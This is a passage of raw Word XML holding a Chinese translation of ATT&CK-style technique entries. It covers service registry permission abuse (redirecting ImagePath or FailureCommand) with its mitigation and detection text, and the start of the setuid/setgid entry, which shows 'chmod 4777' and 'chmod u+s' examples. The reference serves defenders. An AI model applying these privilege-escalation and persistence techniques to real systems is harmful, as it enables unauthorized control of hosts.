          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>sc.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>等工具进行修改服务的执行参数。通过访问控制列表和权限，控制对注册表项的访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288E212D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D6DDB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D6DDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>如果未正确设置用户和组的权限，并允许访问服务的注册表项密钥，则攻击者可以更改服务</w:t>
      </w:r>
      <w:r w:rsidRPr="002D6DDB">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> binPath/ImagePath </w:t>
      </w:r>
      <w:r w:rsidRPr="002D6DDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>以指向其控制下的不同可执行文件。当服务启动或重新启动时，将执行攻击者控制的程序，允许攻击者获得持久性和</w:t>
      </w:r>
      <w:r w:rsidRPr="002D6DDB">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="002D6DDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或权限升级到服务设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="002D6DDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>本地</w:t>
      </w:r>
      <w:r w:rsidRPr="002D6DDB">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="002D6DDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>域帐户、</w:t>
      </w:r>
      <w:r w:rsidRPr="002D6DDB">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="002D6DDB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>、系统、、本地服务或网络服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9B90D7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>对手还可能更改与服务失败参数（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>FailureCommand</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5420">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>关联的注册表项，这些注册表项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在服务失败或故意损坏时可能在提升上下文中执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E106B9C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16FD21E8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3312"/>
        <w:gridCol w:w="6424"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="216929DF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="080A79C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6424" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="14EE9F7D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="0D680757" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A7810F9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制注册表</w:t>
            </w:r>
            <w:r>
              <w:t>权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6424" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B300CCE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>确保为注册表配置单元设置了适当的权限，以防止用户修改可能导致权限升级的系统组件的密钥</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AEE598A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EDE12B" w14:textId="686A0520" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>服务更改反映在注册表中。对现有服务的修改不应频繁发生。如果服务二进制路径或故障参数更改为非该服务的典型值，并且与软件更新无关，则可能是由于恶意活动。不应孤立地查看数据和事件，而应将其视为可能导致其他活动的行为链的一部分，例如为</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>而建立的连接、通过发现了解环境的详细信息以及横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E406F6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>系统内部自动运行等工具还可用于检测可能尝试持久性的系统更改，包括列出当前服务信息。查找与已知软件、修补程序周期等不相关的服务更改。通过与历史数据进行比较，服务执行可疑的程序可能会显示为以前从未见过的异常进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEBEB1F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控用于修改服务的操作的进程和命令行参数。具有内置功能的远程访问工具可以直接与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>交互，以在典型的系统实用程序之外执行这些功能。服务也可能通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统管理工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00070A3D">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00070A3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>管理工具和</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2891">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2891">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>进行更改，因此可能需要配置其他日志记录以收集适当的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A809B5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00070A3D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148951ED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Setuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Setgid</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="2CA1DD2C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7318BD86" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AB74CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AB74CB">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t xml:space="preserve"> T1166</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="172BA203" w14:textId="6EC5C4CD" w:rsidR="000F2665" w:rsidRPr="00AB74CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF308F4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AB74CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AB74CB">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t xml:space="preserve"> Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29AB7DDD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AB74CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AB74CB">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33085FA0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AB74CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AB74CB">
              <w:t>有效权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t>, root</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63495CE2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AB74CB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AB74CB">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="107D2930" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AB74CB">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB74CB">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58AEA671" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="3F342580" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当在</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>macOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上为应用程序设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>setuid</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:t>setgid</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位时，这意味着应用程序将分别使用具备用户或组的权限运行。</w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:tgtFrame="_blank" w:history="1"/>
      <w:r w:rsidRPr="00FF6876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常，应用程序在当前用户的上下文中运行，而不管哪个用户或组拥有该应用程序。在某些情况下，程序需要在提升的上下文中执行才能正常运</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>行，但运行程序的用户不需要提升的权限。任何用户都可以指定要为自己的应用程序设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> setuid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> setgid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>标志，而不是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudoers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件中创建必须由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>完成的条目。通过</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7C02">
        <w:rPr>
          <w:b/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> ls-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>命令查看文件的属性时，这些位用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"x"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>表示。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>程序可以通过位蒙，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>4777 [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或通过速记命名，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>chmod u+s [file]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>设置这些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
